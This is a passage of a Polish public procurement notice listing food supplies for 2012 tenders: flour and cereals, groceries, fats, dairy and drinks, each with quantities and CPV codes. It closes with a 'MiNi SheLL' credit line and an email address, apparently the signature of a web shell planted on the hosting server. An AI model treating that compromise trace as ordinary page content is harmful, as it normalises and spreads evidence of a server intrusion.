<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	30
kasza jęczm. drobna	kg	5
kasza jęczm. Średnia	kg	25
kasza jęczm. Średnia 5kg	szt	3
kasza pęczak	kg	20
mąka pszenna typu 500	kg	60
mąka pszenna typu 450	kg	60
mąka ziemiaczna	kg	20
płatki owsiane	kg	10
płatki kukurydz. 250G	szt	20
platki kukur. 500 g	szt	50
platki kuku.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki typu nestle chocapic	szt	20
ryż w woreczkach 0,5kg	szt	24
ryż 1kg	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	40
baton typu milki way lub równoważny	szt	120
bato typu lion  lub równoważny	szt	80
barszcz czerwony 220ml	szt	20
bialy barszcz	szt	50
budyń	szt	90
chrupki kukurydziane	szt	40
ciastka w polewie	kg	12
ciastka kruche	kg	12
ciastka typy pierniki	kg	12
ciastka typu wafelki	kg	12
Ciastka-rolada  300g	szt	20
cukier	kg	400
cukier puder  0,5 kg	szt	10
cukier waniliowy	szt	60
cukierki czekoladowe	kg	12
cukierki typu krówki	kg	8
cukierki typu szklaki	kg	9
cukierki owocowe	kg	5
cynamon 0,20g	szt	24
czekolada z orzechami	szt	40
czekolada nadziewana	szt	160
czekolada pełnomleczna	szt	200
czipsy	szt	120
drożdże 100g	szt	30
galaretka owocowa	szt	70
gofry	szt	120
herbata expres 100 szt	szt	10
herbata expres 50 szt	szt	40
herbata expr. Mietowa 20szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata granulowana 100g	szt	15
herbata owoc.rozpusz gran.	szt	10
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	20
jarzynka 1kg	szt	5
Jarzynka 0,5 kg	szt	12
Kawa zboż-expr. typu anatol	szt	20
kawa rozpuszczalna zboż	szt	20
kawa rozpusz. typu neskaffe  lub równoważna	szt	2
kawa typy capucino  lub równoważna	szt	20
kawa typu premium 500g lub równoważna	szt	3
kakao typu puchatek  lub równoważny	szt	80
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
Keczup 1 l	szt	10
kisiel	szt	65
kminek 20g	szt	25
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
krem czekolad.typu nutella  lub równoważny	szt	35
krem czek.typu mikli-way 250g  lub równoważny	szt	40
kwasek cytrynowy	szt	100
kwasek cytrynowy 0,5kg	szt	2
liść laurowy 12g	szt	25
liść laurowy 500g	szt	4
lizak typu chupa-chups lub równoważny	szt	40
lizak 	szt	240
lizak typu serduszko	szt	240
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	5
makaron nitki  0.5 kg	szt	30
makaron gniazda 1kg	szt	20
makar. gniaz. 0,5kg typu 	szt	24
makaron rurki 1 kg	szt	10
makaron paczka typu 	szt	20
makaron świderki 1kg	szt	20
makaron spagetti 0,5kg	szt	30
makaron zacierka	szt	72
majeranek 20g	szt	40
majeranek 150g	szt	8
majeranek 500g	szt	4
majonez  350g do sałatek	szt	24
majonez   700g  do sałatek	szt	35
majonez 900g  do sałatek	szt	16
majonez 3kg  do sałatek	szt	6
majonez 5kg  do sałatek	szt	2
mikołaj czekoladowy	szt	40
miód sztuczny 200g	szt	48
miód sztuczny  5kg	szt	2
Miód naturalny 0,9 l	szt	8
musztarda 	szt	36
musztrda tuba 0.5 l	szt	10
musztarda 1l	szt	8
Ocet 10%	szt	48
paluszki solone 0,400g	szt	24
paluszki -cebulowe,kminkowe, paprykowe itp.	szt	120
paluszki z sezamem	szt	40
papryka mielona 20g	szt	50
papryka mielona 1kg	szt	2
paprykarz szczeciń 131g	szt	80
paprykarz szczcz. 300G	szt	40
pasztet wielkopolski 131g  lub równoważny	szt	96
pasztet wielk.z pomid. 131G  lub równoważny	szt	48
pasztet wielk. Z koper. 131G  lub równoważny	szt	48
pieprz mielony 20g	szt	50
pieprz mielony 1000g	szt	4
pieprz w ziarnkach 20g	szt	25
pieprz w ziarnkach 1kg	szt	2
pieprz ziolowy 20g	szt	25
pieprz ziolowy 1 kg	szt	1
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa gyros 30	szt	40
przyprawa gyros 0,700g	szt	2
przyprawa do bigosu 0,3	szt	25
przyprawa do grilla 20g	szt	50
przyprawa do grilla 1kg	szt	1
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka	szt	50
przyprwa do ryb 30g	szt	40
przyprawa do ryb 600g	szt	2
puure ziemn. z boczkiem  35g	szt	40
rosól drobiowy 1 kg	szt	15
rosół drobiowy kost.typu knor	szt	20
soda spożywcza 50g	szt	25
sos typy bolones 0,500l	szt	16
sos chili 1l	szt	3
sos czosnkowy 1 l	szt	8
sos czosnkowy 250ml	szt	22
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos do spagetti słoik  0,5	szt	30
sos mix koper-zioł, włoski itp. 10g	szt	3
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	5
sól	kg	180
sól konserwowa	kg	10
wafelek duży(wafel z kremem typu murzynek)	szt	80
wafelek mały(wafel z kremem typu murzynek)	szt	80
wafelek w polewie	szt	80
wafelek b/polewy typu grzesiek	szt	80
warzywko 200g	szt	30
warzywko 500g	szt	10
Warzywko 1 kg	szt	5
wiórki kokosowe 0,25	szt	10
Zasmazka 1 kg	szt	3
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	40
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	40
ziele angielskie	szt	25
ziele angielskie 600g 	szt	2
zupki typu chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	40
zupki typu chińska(pomidorowa, barszcz,itp)	szt	40
zelatyna 50g	szt	25
Żelatyna 1 kg	szt	2
żurek w butelce 0,5l	szt	30
zurek w proszku 60g	szt	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem	szt	280
Margaryna  0,5 kg	szt	120
masło roślinne 200g	szt	15
oliwa z oliwek 1 l	szt	1
olej 1l	szt	110
olej 3l	szt	10
olej 5l	szt	10
smalec	kg	3
smalec 200g	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser	szt	80
deser typu monte  lub równoważny	szt	40
jogurt pitny	szt	160
jogurt typu fantazja  lub równoważny	szt	40
jogurt typu gratka  lub równoważny	szt	640
jogurt typu jogutek  lub równoważny	szt	120
Żelatyna 1 kg	szt	240
lody 100g	szt	80
lody 1000g	szt	12
kefir 0,5l	szt	40
masło śmietank. 200G	szt	400
maślanka owocowa 0,5	szt	80
Mleko 2  1l	szt	60
Mleko 3,2  1l	szt	140
serek grani	szt	80
serek grani ze szczypiorem		80
serek homogenizowany	szt	40
serek kanapk. Twarożk. 150g	szt	92
serek twaroż. Typu almettelub równo	szt	20
ser twarogowy 200g	szt	30
ser twarogowy półtusty	kg	5
set topiony bloczek 100g	szt	48
ser topiony -kielbaski	szt	60
ser topiony  100g	szt	60
ser top. krążek typu hochl.	szt	30
ser topiony zegar 80g	szt	200
ser wędzony	kg	12
ser  bałtycki	kg	10
ser edamski	kg	11
ser gouda	kg	14
ser kaszub	kg	9
ser królewski	kg	9
ser morski	kg	12
ser tyżycki	kg	9
ser złoty mazur	kg	9
Śmietana 18% 0,5 l	szt	48
Śmietana 18% 1l	szt	12
Śmietana 30%  0,5 l	szt	48
Smietana 30% 1l	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	60
napoje niegazowane 1,5 l	szt	60
napój gazowany 2l	szt	12
napój n/g 2 l	szt	12
napój energet. typu tiger w puszce	szt	120
Woda 0,5 gaz 	szt	120
Woda 0,5 n/g 	szt	120
woda n/g 1,5 l 	szt	80
woda g 1,5 l 	szt	80
woda n/g 1,5 l 	szt	6
woda g 1,5 l 	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com